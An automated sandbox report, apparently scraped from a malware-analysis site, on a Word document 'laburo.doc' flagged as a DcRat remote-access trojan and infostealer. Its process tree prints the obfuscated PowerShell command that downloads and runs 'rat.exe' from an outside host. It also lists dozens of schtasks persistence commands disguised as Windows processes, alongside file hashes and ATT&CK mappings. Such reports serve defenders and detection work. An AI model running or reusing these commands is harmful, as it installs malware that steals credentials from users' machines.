Overview

overview

10

Static

static

8

laburo.doc

windows7-x64

10

laburo.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220722-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-08-2022 17:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    laburo.doc

  • Size

    525KB

  • MD5

    9e5e0266ab23b4cbc05272e0376866f7

  • SHA1

    b8e7bf8f15fa371fefa5d84e42c5cf3929ca3df6

  • SHA256

    7a40a331fa7a62c03e2560207db1e63a2fa30f99d5feb55d4af98508e35bc7f1

  • SHA512

    db7feb0d1f5c33c88eae27679c461ea662c008a3a6629f5deed36e391c84ddc3852bf4f9d708caf21bbfb94914e77aa4c80c0d457ac602af2168905c886f9118

Score
10/10
dcratinfostealerratspywarestealer

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Process spawned unexpected child process 49 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 8 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 48 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\laburo.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Windows\SYSTEM32\rundll32.exe
      rundll32 url.dll,OpenURL C:\Users\Public\ali.lnk
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1216
      • C:\Windows\system32\fOrfiLeS.exe
        "C:\Windows\system32\fOrfiLeS.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://915111.ru/wp-includes/rat.e^xe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1192
        • C:\Windows\system32\cmd.exe
          /c pow^ers^hell/W 01 c^u^rl htt^ps://915111.ru/wp-includes/rat.e^xe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4208
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell /W 01 curl https://915111.ru/wp-includes/rat.exe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1152
            • C:\Users\Public\xczuy.exe
              "C:\Users\Public\xczuy.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:3964
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Refsessionhostsvc\Mt3oQdLiTdARVFkfXUV4PhdFy7ms.vbe"
                7⤵
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:1088
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Refsessionhostsvc\dJGhX.bat" "
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3200
                  • C:\Refsessionhostsvc\msCrt.exe
                    "C:\Refsessionhostsvc\msCrt.exe"
                    9⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Drops file in Program Files directory
                    • Drops file in Windows directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3744
                    • C:\Refsessionhostsvc\msCrt.exe
                      "C:\Refsessionhostsvc\msCrt.exe"
                      10⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2968
                      • C:\Refsessionhostsvc\OfficeClickToRun.exe
                        "C:\Refsessionhostsvc\OfficeClickToRun.exe"
                        11⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2936
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WINWORDW" /sc MINUTE /mo 12 /tr "'C:\Windows\PLA\System\WINWORD.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:204
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WINWORD" /sc ONLOGON /tr "'C:\Windows\PLA\System\WINWORD.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:112
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WINWORDW" /sc MINUTE /mo 14 /tr "'C:\Windows\PLA\System\WINWORD.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4360
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3228
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4784
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\en-US\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:964
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3148
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4484
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 6 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:728
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 10 /tr "'C:\Windows\Performance\WinSAT\DataStore\TrustedInstaller.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1748
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\TrustedInstaller.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1172
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 12 /tr "'C:\Windows\Performance\WinSAT\DataStore\TrustedInstaller.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4276
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Refsessionhostsvc\OfficeClickToRun.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:328
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Refsessionhostsvc\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2736
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Refsessionhostsvc\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4848
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 7 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4284
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4444
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 14 /tr "'C:\Refsessionhostsvc\MoUsoCoreWorker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4924
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\odt\explorer.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1740
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3904
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4232
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\odt\csrss.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1940
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:660
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3344
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\csrss.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2412
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4184
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2564
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Desktop\wininit.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4428
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default\Desktop\wininit.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4840
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Desktop\wininit.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4772
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2860
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4376
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1452
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Refsessionhostsvc\spoolsv.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1084
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Refsessionhostsvc\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3844
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Refsessionhostsvc\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4264
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5116
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3052
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3404
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\odt\RuntimeBroker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4820
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1848
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3820
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3540
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:396
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4720
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\System\ja-JP\dllhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2324
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\System\ja-JP\dllhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4372
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\System\ja-JP\dllhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4572

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Credentials in Files

1
T1081

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Refsessionhostsvc\Mt3oQdLiTdARVFkfXUV4PhdFy7ms.vbe
    Filesize

    200B

    MD5

    715b2a98be54f767bdfdb5bf7dbf2197

    SHA1

    7e87dfe6185d6a9cdd62f52739505735c6f0acc2

    SHA256

    85c764243e776ce9378aa2c8cbcce84372a4ae3343d77eafd0311edba57d62a0

    SHA512

    e4fa22f41ef72d0d6f55b344f2b37115f7866abc89eff6d607c70c55e10156a9a2f0748991f29b550bac4f5a931b28dfdf382ca3cbfb55cfbdedf2a9355fc36b

    Download Submit
  • C:\Refsessionhostsvc\OfficeClickToRun.exe
    Filesize

    1.3MB

    MD5

    ee7ee2d8c3fb2ebd214dacc15f0adbb7

    SHA1

    828d6f11b6b2d9dfb3a22f7521e21301806c1f34

    SHA256

    73950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d

    SHA512

    61a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad

    Download Submit
  • C:\Refsessionhostsvc\OfficeClickToRun.exe
    Filesize

    1.3MB

    MD5

    ee7ee2d8c3fb2ebd214dacc15f0adbb7

    SHA1

    828d6f11b6b2d9dfb3a22f7521e21301806c1f34

    SHA256

    73950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d

    SHA512

    61a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad

    Download Submit
  • C:\Refsessionhostsvc\dJGhX.bat
    Filesize

    32B

    MD5

    619f332557884da3170d6c92e23a08c1

    SHA1

    4807c5257d56a46235581bdb6ccfa8af769aaadc

    SHA256

    63a9884ccd883aec12da917966ce5bae1c5f83c4230f54a86faaa192101f0c86

    SHA512

    8da3fecc43ca0a0f60209b2dccb86c19ca8c22855e932d1b88c16e6474d34d3230c4efaeea9035571ed61bf1854358b5cd75c6e56cba61a1bb78135d0d650530

    Download Submit
  • C:\Refsessionhostsvc\msCrt.exe
    Filesize

    1.3MB

    MD5

    ee7ee2d8c3fb2ebd214dacc15f0adbb7

    SHA1

    828d6f11b6b2d9dfb3a22f7521e21301806c1f34

    SHA256

    73950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d

    SHA512

    61a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad

    Download Submit
  • C:\Refsessionhostsvc\msCrt.exe
    Filesize

    1.3MB

    MD5

    ee7ee2d8c3fb2ebd214dacc15f0adbb7

    SHA1

    828d6f11b6b2d9dfb3a22f7521e21301806c1f34

    SHA256

    73950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d

    SHA512

    61a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad

    Download Submit
  • C:\Refsessionhostsvc\msCrt.exe
    Filesize

    1.3MB

    MD5

    ee7ee2d8c3fb2ebd214dacc15f0adbb7

    SHA1

    828d6f11b6b2d9dfb3a22f7521e21301806c1f34

    SHA256

    73950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d

    SHA512

    61a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msCrt.exe.log
    Filesize

    1KB

    MD5

    bbb951a34b516b66451218a3ec3b0ae1

    SHA1

    7393835a2476ae655916e0a9687eeaba3ee876e9

    SHA256

    eb70c64ae99d14ac2588b7a84854fbf3c420532d7fe4dfd49c7b5a70c869943a

    SHA512

    63bcbfcf8e7421c66855c487c31b2991a989bdea0c1edd4c40066b52fa3eb3d9d37db1cd21b8eb4f33dd5870cc20532c8f485eab9c0b4f6b0793a35c077f2d6f

    Download Submit
  • C:\Users\Public\ali.lnk
    Filesize

    1008B

    MD5

    f51e76f75ba4b8196a1e1cc68672e822

    SHA1

    dde54d73c63ada116aa7c86b8103f265a6a0ad48

    SHA256

    9263bd004ecf82f87354827ad86eeee2a2f23e9201d8d29ebc21f3f57c19c9e8

    SHA512

    66cd24ec8bcf4c1d6d4e72a49f2323e1fd9542df98317bacc6faf756986bbb91f6f195aff7b94fb3c422683e0d504c836bf1e8cc05b1b2ddd9ead4c999448521

    Download Submit
  • C:\Users\Public\xczuy.exe
    Filesize

    1.6MB

    MD5

    c8ae3010b329c7a23fbf74e6970d51ae

    SHA1

    ca4427123f468099ad2d80a6f48eba9ad9899ed3

    SHA256

    6ce2ef7081fdff206c456b6af0e4ee964a08ce0d802b41db703df00808140e7c

    SHA512

    877de3884ac61d11f969e85e42a8479c9df6ec9dd81a16c024596482575eee22b2f87d544a52fe574e803cee4db517226b92e2808084720302c0d22c6b5dbb4a

    Download Submit
  • C:\Users\Public\xczuy.exe
    Filesize

    1.6MB

    MD5

    c8ae3010b329c7a23fbf74e6970d51ae

    SHA1

    ca4427123f468099ad2d80a6f48eba9ad9899ed3

    SHA256

    6ce2ef7081fdff206c456b6af0e4ee964a08ce0d802b41db703df00808140e7c

    SHA512

    877de3884ac61d11f969e85e42a8479c9df6ec9dd81a16c024596482575eee22b2f87d544a52fe574e803cee4db517226b92e2808084720302c0d22c6b5dbb4a

    Download Submit
  • memory/1088-151-0x0000000000000000-mapping.dmp
    Download
  • memory/1152-149-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/1152-143-0x0000000000000000-mapping.dmp
    Download
  • memory/1152-144-0x000001DDF41E0000-0x000001DDF4202000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1152-145-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/1152-146-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/1192-141-0x0000000000000000-mapping.dmp
    Download
  • memory/1216-139-0x0000000000000000-mapping.dmp
    Download
  • memory/1592-174-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-175-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-133-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-132-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-134-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-137-0x00007FFA174D0000-0x00007FFA174E0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-136-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-135-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-138-0x00007FFA174D0000-0x00007FFA174E0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-177-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1592-176-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2936-171-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2936-172-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2936-167-0x0000000000000000-mapping.dmp
    Download
  • memory/2968-162-0x0000000000000000-mapping.dmp
    Download
  • memory/2968-170-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2968-166-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3200-154-0x0000000000000000-mapping.dmp
    Download
  • memory/3744-165-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3744-161-0x000000001C460000-0x000000001C988000-memory.dmp
    Filesize

    5.2MB

    Download
  • memory/3744-160-0x0000000002E80000-0x0000000002ED0000-memory.dmp
    Filesize

    320KB

    Download
  • memory/3744-159-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/3744-158-0x00000000009C0000-0x0000000000B10000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/3744-155-0x0000000000000000-mapping.dmp
    Download
  • memory/3964-147-0x0000000000000000-mapping.dmp
    Download
  • memory/4208-142-0x0000000000000000-mapping.dmp
    Download